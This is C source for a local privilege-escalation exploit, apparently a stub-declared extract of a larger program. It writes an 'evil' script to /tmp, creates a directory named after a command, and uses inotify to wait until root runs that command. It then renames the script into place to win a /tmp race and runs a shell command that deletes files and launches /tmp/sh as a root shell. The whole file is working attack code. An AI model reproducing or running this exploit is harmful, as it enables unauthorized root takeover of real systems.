
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






typedef int argv ;


 int IN_CREATE ;
 int SYS_read ;
 int SYS_rename ;
 int S_IRWXG ;
 int S_IRWXO ;
 int S_IRWXU ;
 int create_nasty_shell (char*) ;
 int inotify_add_watch (int,char*,int ) ;
 int inotify_init () ;
 int inotify_rm_watch (int,int) ;
 char* malloc (int) ;
 int mkdir (char*,int) ;
 int printf (char*,...) ;
 int sleep (int) ;
 int sprintf (char*,char*,char*) ;
 int syscall (int ,...) ;
 int system (char*) ;

int main(int argc, char **argv) {
  int fd, wd;
  char buf[1], *targetpath,
       *evilsh = "/tmp/evil", *trash = "/tmp/trash";

  if (argc < 2) {
    printf("usage: %s <cmd name>\n", argv[0]);
    return 1;
  }

  printf("[*] launching attack against \"%s\"\n", argv[1]);

  printf("[+] creating evil script (/tmp/evil)\n");
  create_nasty_shell(evilsh);

  targetpath = malloc(sizeof(argv[1]) + 6);
  sprintf(targetpath, "/tmp/%s", argv[1]);

  printf("[+] creating target directory (%s)\n", targetpath);
  mkdir(targetpath, S_IRWXU|S_IRWXG|S_IRWXO);

  printf("[+] initialize inotify\n");
  fd = inotify_init();
  wd = inotify_add_watch(fd, targetpath, IN_CREATE);

  printf("[+] waiting for root to launch \"%s\"\n", argv[1]);
  syscall(SYS_read, fd, buf, 1);
  syscall(SYS_rename, targetpath, trash);
  syscall(SYS_rename, evilsh, targetpath);

  inotify_rm_watch(fd, wd);

  printf("[+] opening root shell (/tmp/sh)\n");
  sleep(2);
  system("rm -fr /tmp/trash;/tmp/sh || echo \"[-] Failed.\"");

  return 0;
}
